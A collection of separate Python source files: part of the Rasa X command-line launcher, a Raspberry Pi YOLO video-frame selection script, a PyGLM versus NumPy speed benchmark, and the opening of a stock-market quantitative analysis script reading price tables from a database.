custom_wait_time_pulls = model_endpoint.kwargs.get("wait_time_between_pulls")
return EndpointConfig(
default_rasax_model_server_url,
token=rasa_x_token,
wait_time_between_pulls=custom_wait_time_pulls or 2,
)
def _get_event_broker_endpoint(
event_broker_endpoint: Optional[EndpointConfig],
) -> EndpointConfig:
import questionary
default_event_broker_endpoint = EndpointConfig(
type="sql", dialect="sqlite", db=DEFAULT_EVENTS_DB
)
if not event_broker_endpoint:
return default_event_broker_endpoint
elif not _is_correct_event_broker(event_broker_endpoint):
rasa.shared.utils.cli.print_error(
f"Rasa X currently only supports a SQLite event broker with path "
f"'{DEFAULT_EVENTS_DB}' when running locally. You can deploy Rasa X "
f"with Docker ({DOCS_BASE_URL_RASA_X}/installation-and-setup/"
f"docker-compose-quick-install/) if you want to use other event broker "
f"configurations."
)
continue_with_default_event_broker = questionary.confirm(
"Do you want to continue with the default SQLite event broker?"
).ask()
if not continue_with_default_event_broker:
sys.exit(0)
return default_event_broker_endpoint
else:
return event_broker_endpoint
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
return all(
[
event_broker.type == "sql",
event_broker.kwargs.get("dialect", "").lower() == "sqlite",
event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB,
]
)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
rasa_x_url = f"http://localhost:{args.rasa_x_port}/api"
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(
target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
)
p.daemon = True
p.start()
return p
def is_rasa_x_installed() -> bool:
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length: int = 16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args: argparse.Namespace):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
logging.basicConfig(level=log_level)
rasa.utils.io.configure_colored_logging(args.loglevel)
set_log_level(log_level)
configure_file_logging(logging.root, args.log_file)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(args: argparse.Namespace, project_path: Text) -> bool:
config_path = _get_config_path(args)
mandatory_files = [config_path, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
if not is_rasa_x_installed():
rasa.shared.utils.cli.print_error_and_exit(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X. "
"Instructions on how to install Rasa X can be found here: "
"https://rasa.com/docs/rasa-x/."
)
if args.port == args.rasa_x_port:
rasa.shared.utils.cli.print_error_and_exit(
"The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
"same. We need two different ports, one to run Rasa X (e.g. delivering the "
"UI) and another one to run a normal Rasa server.\nPlease specify two "
"different ports using the arguments '--port' and '--rasa-x-port'.".format(
args.rasa_x_port, args.port
)
)
if not is_rasa_project_setup(args, project_path):
rasa.shared.utils.cli.print_error_and_exit(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory (see http://rasa.com/docs/rasa/user-guide/"
"rasa-tutorial/#create-a-new-project)."
)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
rasa.shared.utils.cli.print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
def _validate_domain(domain_path: Text):
from rasa.shared.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
rasa.shared.utils.cli.print_error_and_exit(
"The provided domain file could not be loaded. " "Error: {}".format(e)
)
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import signal_handler
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
run_in_production(args)
else:
run_locally(args)
async def _pull_runtime_config_from_server(
config_endpoint: Optional[Text],
attempts: int = 60,
wait_time_between_pulls: float = 5,
keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
"""Pull runtime config from `config_endpoint`.
Returns a list of paths to yaml dumps, each containing the contents of one of
`keys`.
"""
while attempts:
try:
async with aiohttp.ClientSession() as session:
async with session.get(config_endpoint) as resp:
if resp.status == 200:
rjs = await resp.json()
try:
return [
rasa.utils.io.create_temporary_file(rjs[k])
for k in keys
]
except KeyError as e:
rasa.shared.utils.cli.print_error_and_exit(
"Failed to find key '{}' in runtime config. "
"Exiting.".format(e)
)
else:
logger.debug(
"Failed to get a proper response from remote "
"server. Status Code: {}. Response: '{}'"
"".format(resp.status, await resp.text())
)
except aiohttp.ClientError as e:
logger.debug(f"Failed to connect to server. Retrying. {e}")
await asyncio.sleep(wait_time_between_pulls)
attempts -= 1
rasa.shared.utils.cli.print_error_and_exit(
"Could not fetch runtime config from server at '{}'. "
"Exiting.".format(config_endpoint)
)
def run_in_production(args: argparse.Namespace):
from rasa.shared.utils.cli import print_success
print_success("Starting Rasa X in production mode... 🚀")
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
_rasa_service(args, endpoints, None, credentials_path)
def _get_config_path(args: argparse.Namespace,) -> Optional[Text]:
config_path = rasa.cli.utils.get_validated_path(
args.config, "config", DEFAULT_CONFIG_PATH
)
return config_path
def _get_credentials_and_endpoints_paths(
args: argparse.Namespace,
) -> Tuple[Optional[Text], Optional[Text]]:
config_endpoint = args.config_endpoint
if config_endpoint:
endpoints_config_path, credentials_path = rasa.utils.common.run_in_loop(
_pull_runtime_config_from_server(config_endpoint)
)
else:
endpoints_config_path = rasa.cli.utils.get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
credentials_path = None
return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
# noinspection PyUnresolvedReferences
from rasax.community import local # pytype: disable=import-error
args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
args.port = args.port or DEFAULT_RASA_PORT
project_path = "."
_validate_rasa_x_start(args, project_path)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
config_path = _get_config_path(args)
# noinspection PyBroadException
try:
local.main(
args, project_path, args.data, token=rasa_x_token, config_path=config_path
)
except RasaXTermsError:
# User didn't accept the Rasa X terms.
pass
except Exception:
print(traceback.format_exc())
rasa.shared.utils.cli.print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
|
shots_segmentation_client_RPi.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 5 12:03:29 2018
@author: imlab
"""
print ('Processing...')
import cv2
import threading
from threading import Thread
from yolo_main import tinu
import time
import os
s_time = time.time()
def video0():
print ('Processing Video')
#capture = cv2.VideoCapture('15 fps Office/office-0_15fps.avi')
#################
capture = cv2.VideoCapture('Road_6FPS/0410_1_6fps.avi')
#################
total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
# fpss = capture.get(cv2.CAP_PROP_FPS)
status_i , frame_i = capture.read()
i = 1
counter = 0
vehicles = 0
persons = 0
sending_flag = 0
shots_counter = 0
shot_number = 0
frames_count = 10
while(i < total_frames - 1):
sending_flag = sending_flag + 1
if sending_flag >= 3:
sending_flag = 0
image, confidences, class_ids = tinu(frame_i)
#print ('**',confidences)
#cv2.imshow('Frame',image)
if len(confidences) is not 0:
if any([x > 0.7 for x in confidences]):
cycle = class_ids.count(1)
car = class_ids.count(2)
bike = class_ids.count(3)
bus = class_ids.count(5)
train = class_ids.count(6)
truck = class_ids.count(7)
vehicles = cycle + car + bike + bus + train + truck
persons = class_ids.count(0)
#print ('persons = ' , persons, 'vehicles = ', vehicles)
#print ('**',confidences,'##')
if (vehicles >= 4 and persons >= 2) or (vehicles >= 3 and persons >= 3) or (vehicles >= 5) or (persons >= 5):
frames_count = frames_count + 1
if frames_count >= 10:
frames_count = 0
shot_number = shot_number + 1
shots_path = 'Master-RPi/' + str(shot_number)
if os.path.exists(shots_path):
pass
else:
os.mkdir(shots_path)
###############
path = 'Master-RPi/' + str(shot_number) + '/frame_' + str(i) + '_v1.png'
###############
cv2.imwrite(path,frame_i)
print ('Frame written at: ', path)
#cv2.imshow('f',image)
#cv2.waitKey(30)
vehicles = 0
persons = 0
status_i , frame_i = capture.read()
#copy = frame_i
k = cv2.waitKey(30) & 0xff
i = i + 1
if k == 27:
break
print ('Processing Video 0 done')
video0()
#
#threads = 16 # Number of processes to create
#jobs = []
#
#thread0 = threading.Thread(target=video0)
#jobs.append(thread0)
#
#thread1 = threading.Thread(target=video1)
#jobs.append(thread1)
#
#thread2 = threading.Thread(target=video2)
#jobs.append(thread2)
#thread3 = threading.Thread(target=video3)
#jobs.append(thread3)
#
#
#for j in jobs:
# j.start()
#
#for j in jobs:
#
# j.join()
#
e_time = time.time()
total_time = e_time - s_time
print ('total time = ', total_time)
|
PyGLM vs NumPy.py
|
from threading import Thread
import time, math
glm_counter = 0
numpy_counter = 0
glm_time = 0
numpy_time = 0
test_duration = 1
display_update_delay = 1 / 10
results = []
def measure_function_glm(func, *args, **kw):
global glm_counter
glm_counter = 0
start = time.time()
last_print = 0
while True:
func(*args, **kw)
glm_counter += 1
now = time.time()
if now >= start + test_duration:
break
if now - last_print > display_update_delay:
last_print = now
print("\rPyGLM: {: 9d}x".format(glm_counter), end="")
print("\rPyGLM: {: 9d}x".format(glm_counter))
def measure_function_numpy(func, *args, **kw):
global numpy_counter
numpy_counter = 0
start = time.time()
last_print = 0
while True:
func(*args, **kw)
numpy_counter += 1
now = time.time()
if now >= start + test_duration:
break
if now - last_print > display_update_delay:
last_print = now
print("\rNumPy: {: 9d}x".format(numpy_counter), end="")
print("\rNumPy: {: 9d}x".format(numpy_counter))
"""
def print_percentage():
global glm_counter, numpy_counter
start = time.time()
last_print = 0
while glm_counter < repititions or numpy_counter < repititions:
print("\rPyGLM: {: 4d}%, NumPy: {: 4d}%".format(int(glm_counter / repititions * 100), int(numpy_counter / repititions * 100)), end="")
print("\rPyGLM: {: 4d}%, NumPy: {: 4d}%".format(int(glm_counter / repititions * 100), int(numpy_counter / repititions * 100)))
"""
def arg_to_string(arg):
if isinstance(arg, type):
return "{}.{}".format(arg.__module__, arg.__name__)
return repr(arg)
def get_evaluation_string(glm_counter, numpy_counter):
if (glm_counter > numpy_counter):
return "PyGLM was {:.2f}x as fast as NumPy".format(glm_counter / numpy_counter)
else:
return "NumPy was {:.2f}x as fast as PyGLM".format(numpy_counter / glm_counter)
def test_func(description, glm_func, glm_args, numpy_func, numpy_args):
print("-"*80)
print("Comparing {}.\n".format(description))
print("PyGLM instruction:\n\t{}.{}({})\n".format(glm_func.__module__, glm_func.__name__, ", ".join([arg_to_string(x) for x in glm_args])))
print("NumPy instruction:\n\t{}.{}({})\n".format(numpy_func.__module__, numpy_func.__name__, ", ".join([arg_to_string(x) for x in numpy_args])))
print("Running for {} seconds...".format(test_duration))
measure_function_glm(glm_func, *glm_args)
measure_function_numpy(numpy_func, *numpy_args)
#Thread(target=measure_function_glm, args=[glm_func] + list(glm_args)).start()
#Thread(target=measure_function_numpy, args=[numpy_func] + list(numpy_args)).start()
#print_percentage()
print("\nTimes ran:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_counter, numpy_counter))
print("{}.\n".format(get_evaluation_string(glm_counter, numpy_counter)))
results.append((description, glm_counter, numpy_counter))
def test_operation(description, operation, format_, glm_args, numpy_args):
print("-"*80)
print("Comparing {}.\n".format(description))
print("PyGLM instruction:\n\t{}\n".format(format_.format(*[arg_to_string(x) for x in glm_args])))
print("NumPy instruction:\n\t{}\n".format(format_.format(*[arg_to_string(x) for x in numpy_args])))
print("Running for {} second(s)...".format(test_duration))
measure_function_glm(operation, *glm_args)
measure_function_numpy(operation, *numpy_args)
#Thread(target=measure_function_glm, args=[operation] + list(glm_args)).start()
#Thread(target=measure_function_numpy, args=[operation] + list(numpy_args)).start()
#print_percentage()
print("\nTimes ran:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_counter, numpy_counter))
print("{}.\n".format(get_evaluation_string(glm_counter, numpy_counter)))
results.append((description, glm_counter, numpy_counter))
def print_table_row(descr, glm_time, numpy_time, ratio):
while len(descr) > 38:
last_space = descr[:38].rfind(" ")
print(("| {} | " + " " * 10 + " | " + " " * 10 + " | " + " " * 9 + " |").format(descr[:last_space] + (38 - last_space) * " "))
descr = descr[last_space + 1:]
print("| {} | {} | {} | {} |".format(descr + (38 - len(descr)) * " ", glm_time, numpy_time, ratio))
def format_large_num(num):
log10 = int(math.log10(num))
if log10 <= 5:
out = "{:,} ".format(num)
elif log10 <= 8:
out = "{:,}M".format(num // 1000).replace(",", ".")
else:
out = "{:,}B".format(num // 1000000).replace(",", ".")
return " " * (9 - len(out)) + out
def print_results():
for description, glm_counter, numpy_counter in results:
print_table_row(description, "{} ".format(format_large_num(glm_counter)), "{} ".format(format_large_num(numpy_counter)), "{: 8.2f}x".format(glm_counter / numpy_counter))
print("+----------------------------------------+------------+------------+-----------+")
import glm, numpy
"""
print("-"*80)
print("Comparing import speed.")
start = time.time()
import glm
glm_time = time.time() - start
start = time.time()
import numpy
numpy_time = time.time() - start
results.append(("import", numpy_time, glm_time))
print("\nTime taken:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_time, numpy_time))
print("{}.\n".format(get_evaluation_string(numpy_time, glm_time)))
"""
test_func("3 component vector creation", glm.vec3, [0], numpy.zeros, [(3,), numpy.float32])
test_func("3 component vector creation with custom components", glm.vec3, [1, 2, 3], numpy.array, [(1, 2, 3), numpy.float32])
test_func("dot product", glm.dot, [glm.vec3(), glm.vec3()], numpy.dot, [numpy.zeros((3,)), numpy.zeros((3,))])
repititions = 100_000
test_func("cross product", glm.cross, [glm.vec3(1), glm.vec3(1,2,3)], numpy.cross, [numpy.array((1,1,1), numpy.float32), numpy.array((1,2,3), numpy.float32)])
test_func("L2-Norm of 3 component vector", glm.l2Norm, [glm.vec3(1,2,3)], numpy.linalg.norm, [numpy.array((1,2,3), numpy.float32)])
repititions = 1_000_000
test_func("4x4 matrix creation", glm.mat4, [0], numpy.zeros, [(4,4), numpy.float32])
test_func("4x4 identity matrix creation", glm.identity, [glm.mat4], numpy.identity, [4, numpy.float32])
test_func("4x4 matrix transposition", glm.transpose, [glm.mat4()], numpy.transpose, [numpy.identity(4, numpy.float32)])
repititions = 100_000
test_func("4x4 matrix multiplicative inverse", glm.inverse, [glm.mat4()], numpy.linalg.inv, [numpy.identity(4, numpy.float32)])
repititions = 1_000_000
test_operation("3 component vector addition", lambda x, y: (x+y), "{} + {}", [glm.vec3(), glm.vec3()], [numpy.zeros(3, numpy.float32), numpy.zeros(3, numpy.float32)])
test_operation("4x4 matrix multiplication", lambda x, y: (x*y), "{} * {}", [glm.mat4(), glm.mat4()], [numpy.identity(4, numpy.float32), numpy.identity(4, numpy.float32)])
test_operation("4x4 matrix - 4 component vector multiplication", lambda x, y: (x*y), "{} * {}", [glm.mat4(), glm.vec4()], [numpy.identity(4, numpy.float32), numpy.zeros(4, numpy.float32)])
print("#" *80)
print("RESULTS:\n")
print("+----------------------------------------+------------+------------+-----------+")
print("| Description | PyGLM runs | NumPy runs | ratio |")
print("+----------------------------------------+------------+------------+-----------+")
print_results()
|
main.py
|
import pandas as pd
import akshare as ak
import yfinance as yf
import psycopg2
from sqlalchemy import create_engine
from numpy import (float64, nan)
from abc import (abstractmethod)
import pathlib
import os
import time
from EmQuantAPI import *
import traceback
import datetime
import enum
import logging as log
import sys
import threading
from queue import Queue
from email.message import EmailMessage
from email.mime.text import MIMEText
import smtplib
from MyTT import *
import efinance as ef
from tqdm import tqdm
# 列名与数据对其显示
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
# 显示所有列
pd.set_option('display.max_columns', None)
# 显示所有行
pd.set_option('display.max_rows', None)
log.basicConfig(level=log.DEBUG,
format='[%(asctime)s %(filename)s [line:%(lineno)d]] %(levelname)s %(message)s',
datefmt='%d %b %Y %H:%M:%S',
filename='myquant.log',
filemode='a+')
logger = log.getLogger("MyQuant")
# logger.addHandler(log.StreamHandler(sys.stdout))
def append_value(dict_obj, key, value_inner):
# Check if key exist in dict or not
if key in dict_obj:
# Key exist in dict.
# Check if type of value of key is list or not
if not isinstance(dict_obj[key], list):
# If type is not list then make it list
dict_obj[key] = [dict_obj[key]]
# Append the value in list
dict_obj[key].append(value_inner)
else:
# As key is not in dict,
# so, add key-value pair
dict_obj[key] = value_inner
def time_measure(func):
def inner(*args, **kwargs):
starttime = time.perf_counter()
ret = func(*args, **kwargs)
endtime = time.perf_counter()
logger.debug("{} took {}s".format(str(func), endtime - starttime))
return ret
return inner
class CountryCode(enum.Enum):
CHINA = 'cn'
US = 'us'
NONE = 'none'
exchanges = {"中小企业板": 'sz',
"创业板": 'sz',
"主板": 'sz',
"科创板": 'sh',
"主板A股": 'sh'}
class DataContext:
country = CountryCode.NONE
limitfordatafetched = 0
limitfordatafetched_30 = 0
limitfordatafetched_60 = 0
limitfordatafetched_240 = 0
markets = []
marketopentime: datetime.time = None
marketclosetime: datetime.time = None
marketbreakstarttime: datetime.time = None
marketbreakstoptime: datetime.time = None
dir_name = ''
invalid_stock_codes = set()
sendemial_interval = 6
strategy1 = 'strategy1'
strategy2 = 'strategy2'
strategy3 = 'strategy3'
strategy4 = 'strategy4'
strategy5 = 'strategy5'
strategy6 = 'strategy6'
strategy1_2 = 'strategy1and2'
strategy1_4 = 'strategy1and4'
strategy100 = 'strategy100'
strategy101 = 'strategy101'
strategy102 = 'strategy102'
strategy103 = 'strategy103'
strategy104 = 'strategy104'
strategy7 = 'strategy7'
strategy8 = 'strategy8'
strategy9 = 'strategy9'
strategy10 = 'strategy10'
strategy11 = 'strategy11'
strategy12 = 'strategy12'
strategy13 = 'strategy13'
strategy14 = 'strategy14'
email_recipient = 'wsx_dna@sina.com'
email_other1_recipient = 'stocash2021@163.com'
email_other2_recipient = 'Li_hewei@126.com'
code_spotlighted = [7171, 2901, 300571, 2634, 300771, 603871, 603165, 603755, 2950, 688178,
603506, 603757, 537, 600167, 300765, 603327, 603360, 300738, 688026, 300800,
600452, 603277, 300497, 603380, 603848, 600477, 603697, 2768, 300701, 2973,
603639, 603357, 300640, 603053, 300246, 603203, 603040, 603657, 603530, 603458,
300602, 603466, 2653, 2923, 300559, 603867, 603326, 2892, 2853, 2287,
688289, 955, 2030, 688298, 688317, 603301, 2131, 688399, 576, 600685,
300030, 2382, 600683, 603985, 300246, 600026, 2838, 300206, 2567, 2310,
600836, 600975, 603079, 2026, 2585, 2432, 2726, 2181, 2980, 300658,
2950, 2157, 585, 600133, 603238, 2605, 868, 600011, 600527, 603758,
2487, 601991, 300443, 2223, 300210, 27, 628, 600739, 532, 601377,
300690, 421, 690, 987, 600961, 600198, 605358, 600460, 2151, 688126,
300236, 688258, 603690, 300077, 300139, 688981, 300671, 688233, 600206, 688595,
300706, 300333, 603005, 2371, 300493, 600667, 300661, 688123, 300548, 600360,
603806, 600517, 875, 601908, 601222, 601012, 601615, 603218, 27, 600008,
688599, 300185, 300850, 400, 300815, 625, 2266, 601877, 881]
@classmethod
def initklz(cls, country_param: CountryCode):
DataContext.country = country_param
if DataContext.iscountryChina():
DataContext.limitfordatafetched = 160
DataContext.limitfordatafetched_30 = 160
DataContext.limitfordatafetched_60 = 320
DataContext.limitfordatafetched_240 = 128
DataContext.markets = ["创业板", "中小企业板", "主板A股", "主板", "科创板"]
DataContext.marketopentime = datetime.time(hour=9, minute=30)
DataContext.marketclosetime = datetime.time(hour=15)
DataContext.marketbreakstarttime = datetime.time(hour=11, minute=30)
DataContext.marketbreakstoptime = datetime.time(hour=13)
DataContext.dir_name = os.path.join(r'./result_strategy/cn', datetime.datetime.today().strftime('%Y%m%d'))
elif DataContext.iscountryUS():
DataContext.limitfordatafetched = 260
DataContext.limitfordatafetched_30 = 195
DataContext.markets = ["NASDAQ", "NYSE", "AMEX"]
DataContext.marketopentime = datetime.time(hour=9, minute=30)
DataContext.marketclosetime = datetime.time(hour=16)
DataContext.dir_name = os.path.join(r'./result_strategy/us', datetime.datetime.today().strftime('%Y%m%d'))
DataContext.invalid_stock_codes = {"AMCI.O", "BDGE.O", "BEAT.O", "FSDC.O", "GTLS.O", "HFEN.O", "INAQ.O",
"NOVS.O", "PEIX.O", "YRCW.O", "CCC.N", "CTRA.N", "PCPL.N", "SALT.N",
"CRMD.A", "CTO.A", "MCAC.O", "PANA.N", "OBLG.A", "LGVW.N", "XAN_C.N",
"XAN.N", "WYND.N", "CVLB.O"}
@classmethod
def iscountryChina(cls):
return DataContext.country == CountryCode.CHINA
@classmethod
def iscountryUS(cls):
return DataContext.country == CountryCode.US
def __init__(self):
self.start_i = -1
self.end_i = -1
self.cross_sma_period = 70
self.rsv_period = 9
self.k_period = 3
self.d_period = 3
self.obv_period = 70
self.obv_a_period = 30
self.queue = Queue()
if not os.path.isdir(DataContext.dir_name):
os.mkdir(DataContext.dir_name)
if DataContext.iscountryChina():
self.greater_than_sma_period = 80
# 15mins
self.China_small_15 = StockData('small')
self.China_startup_15 = StockData('startup')
self.China_tech_startup_15 = StockData('tech_startup')
self.China_sh_a_15 = StockData('sh_a')
self.China_sz_a_15 = StockData('sz_a')
# 30mins
self.China_small_30 = StockData('small')
self.China_startup_30 = StockData('startup')
self.China_tech_startup_30 = StockData('tech_startup')
self.China_sh_a_30 = StockData('sh_a')
self.China_sz_a_30 = StockData('sz_a')
# 60mins
self.China_small_60 = StockData('small')
self.China_startup_60 = StockData('startup')
self.China_tech_startup_60 = StockData('tech_startup')
self.China_sh_a_60 = StockData('sh_a')
self.China_sz_a_60 = StockData('sz_a')
# 240mins
self.China_small_240 = StockData('small')
self.China_startup_240 = StockData('startup')
self.China_tech_startup_240 = StockData('tech_startup')
self.China_sh_a_240 = StockData('sh_a')
self.China_sz_a_240 = StockData('sz_a')
# symbol lists
self.symbols_l_tech_startup = []
self.symbols_l_startup = []
self.symbols_l_small = []
self.symbols_l_sh_a = []
self.symbols_l_sz_a = []
# symbol.exchange lists
self.symbols_exchange_l_tech_startup = []
self.symbols_exchange_l_startup = []
self.symbols_exchange_l_small = []
self.symbols_exchange_l_sh_a = []
self.symbols_exchange_l_sz_a = []
self.preparedata("科创板")
self.preparedata("中小企业板")
self.preparedata("创业板")
self.preparedata("主板A股")
self.preparedata("主板")
self.data15mins = {stock_group["科创板"]: self.China_tech_startup_15,
stock_group["中小企业板"]: self.China_small_15,
stock_group["创业板"]: self.China_startup_15,
stock_group["主板A股"]: self.China_sh_a_15,
stock_group["主板"]: self.China_sz_a_15}
self.data30mins = {stock_group["科创板"]: self.China_tech_startup_30,
stock_group["中小企业板"]: self.China_small_30,
stock_group["创业板"]: self.China_startup_30,
stock_group["主板A股"]: self.China_sh_a_30,
stock_group["主板"]: self.China_sz_a_30}
self.data60mins = {stock_group["科创板"]: self.China_tech_startup_60,
stock_group["中小企业板"]: self.China_small_60,
stock_group["创业板"]: self.China_startup_60,
stock_group["主板A股"]: self.China_sh_a_60,
stock_group["主板"]: self.China_sz_a_60}
self.data240mins = {stock_group["科创板"]: self.China_tech_startup_240,
stock_group["中小企业板"]: self.China_small_240,
stock_group["创业板"]: self.China_startup_240,
stock_group["主板A股"]: self.China_sh_a_240,
stock_group["主板"]: self.China_sz_a_240}
self.symbols = {stock_group["科创板"]: self.symbols_l_tech_startup,
stock_group["中小企业板"]: self.symbols_l_small,
stock_group["创业板"]: self.symbols_l_startup,
stock_group["主板A股"]: self.symbols_l_sh_a,
stock_group["主板"]: self.symbols_l_sz_a}
self.symbols_exchange = {stock_group["科创板"]: self.symbols_exchange_l_tech_startup,
stock_group["中小企业板"]: self.symbols_exchange_l_small,
stock_group["创业板"]: self.symbols_exchange_l_startup,
stock_group["主板A股"]: self.symbols_exchange_l_sh_a,
stock_group["主板"]: self.symbols_exchange_l_sz_a}
elif DataContext.iscountryUS():
self.greater_than_sma_period = 130
# 15mins
self.US_nasdaq_15 = StockData(stock_group["NASDAQ"])
self.US_nyse_15 = StockData(stock_group['NYSE'])
self.US_amex_15 = StockData(stock_group['AMEX'])
# 30mins
self.US_nasdaq_30 = StockData(stock_group["NASDAQ"])
self.US_nyse_30 = StockData(stock_group['NYSE'])
self.US_amex_30 = StockData(stock_group['AMEX'])
# symbol lists
self.symbols_l_nasdaq = []
self.symbols_l_nyse = []
self.symbols_l_amex = []
# symbol.exchange lists
self.symbols_exchange_l_nasdaq = []
self.symbols_exchange_l_nyse = []
self.symbols_exchange_l_amex = []
self.preparedata("NASDAQ")
self.preparedata("NYSE")
self.preparedata("AMEX")
self.data15mins = {stock_group["NASDAQ"]: self.US_nasdaq_15,
stock_group["NYSE"]: self.US_nyse_15,
stock_group["AMEX"]: self.US_amex_15}
self.data30mins = {stock_group["NASDAQ"]: self.US_nasdaq_30,
stock_group["NYSE"]: self.US_nyse_30,
stock_group["AMEX"]: self.US_amex_30}
self.symbols = {stock_group["NASDAQ"]: self.symbols_l_nasdaq,
stock_group["NYSE"]: self.symbols_l_nyse,
stock_group["AMEX"]: self.symbols_l_amex}
self.symbols_exchange = {stock_group["NASDAQ"]: self.symbols_exchange_l_nasdaq,
stock_group["NYSE"]: self.symbols_exchange_l_nyse,
stock_group["AMEX"]: self.symbols_exchange_l_amex}
self.sendemailtime: datetime.datetime = None
self.totalresult = {DataContext.strategy1_4: {}, DataContext.strategy1_2: {},
DataContext.strategy5: {}, DataContext.strategy100: {},
DataContext.strategy4: {}, DataContext.strategy1: {},
DataContext.strategy2: {}, DataContext.strategy3: {},
DataContext.strategy101: {}, DataContext.strategy102: {},
DataContext.strategy6: {}, DataContext.strategy7: {},
DataContext.strategy103: {}, DataContext.strategy8: {},
DataContext.strategy104: {}, DataContext.strategy9: {},
DataContext.strategy10: {}, DataContext.strategy11: {},
DataContext.strategy12: {}, DataContext.strategy13: {},
DataContext.strategy14: {}}
self.sectors = {}
logger.debug("Initialization of context is done.")
def preparedata(self, indicator: str):
logger.debug("--- Start to prepare data --- " + indicator)
tablename_prefixes = ["", "", "", ""]
def gentablenameprefix(prefixes: list):
if DataContext.iscountryChina():
countrycode = 'china_'
else:
countrycode = 'us_'
if indicator == "科创板":
prefixes[0] = 'china_tbl_'
else:
prefixes[0] = countrycode + stock_group[indicator] + '_tbl_'
prefixes[1] = countrycode + stock_group[indicator] + '_tbl_30_'
prefixes[2] = countrycode + stock_group[indicator] + '_tbl_60_'
prefixes[3] = countrycode + stock_group[indicator] + '_tbl_240_'
if indicator in {"中小企业板", "创业板", "主板"}:
header = "公司代码"
elif indicator in {"科创板", "主板A股"}:
header = 'SECURITY_CODE_A'
elif indicator in {"NASDAQ", "NYSE", "AMEX"}:
header = 'SECURITY_CODE_A'
exchange = exchanges[indicator]
gentablenameprefix(tablename_prefixes)
tmp_symbol_l = []
tmp_symbol_exchange_l = []
tmp_data = StockData()
tmp_data.sector = stock_group[indicator]
tmp_data_30 = StockData()
tmp_data_30.sector = stock_group[indicator]
tmp_data_60 = StockData()
tmp_data_60.sector = stock_group[indicator]
tmp_data_240 = StockData()
tmp_data_240.sector = stock_group[indicator]
def getdatafromdatabase(tablename: str, limits: int):
sql_statement = "select * from \"{}\" order by crt_time desc limit {};".format(tablename, limits)
datafromdatabase = pd.read_sql_query(sql_statement, engine, index_col='crt_time')
datafromdatabase.sort_index(inplace=True)
return datafromdatabase
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
if DataContext.iscountryChina():
tmp_symbol_l = symbolsfromcsv[header].astype(str).str.zfill(6).tolist()
elif DataContext.iscountryUS():
tmp_symbol_l = symbolsfromcsv[header].astype(str).tolist()
for symbol in tmp_symbol_l:
if DataContext.iscountryChina():
internal_symbol = ".".join([symbol, exchange])
tmp_symbol_exchange_l.append(internal_symbol)
elif DataContext.iscountryUS():
symbol_exchange_l = symbol.split(".")
if len(symbol_exchange_l) > 1:
symbol = symbol_exchange_l[0]
tmp_symbol_exchange_l.append(symbol)
else:
logger.error('%s is invalid', symbol)
continue
table_name = tablename_prefixes[0] + symbol
tmp_data.update(symbol, getdatafromdatabase(table_name, DataContext.limitfordatafetched))
table_name_30 = tablename_prefixes[1] + symbol
tmp_data_30.update(symbol, getdatafromdatabase(table_name_30, DataContext.limitfordatafetched_30))
if DataContext.iscountryChina():
table_name_60 = tablename_prefixes[2] + symbol
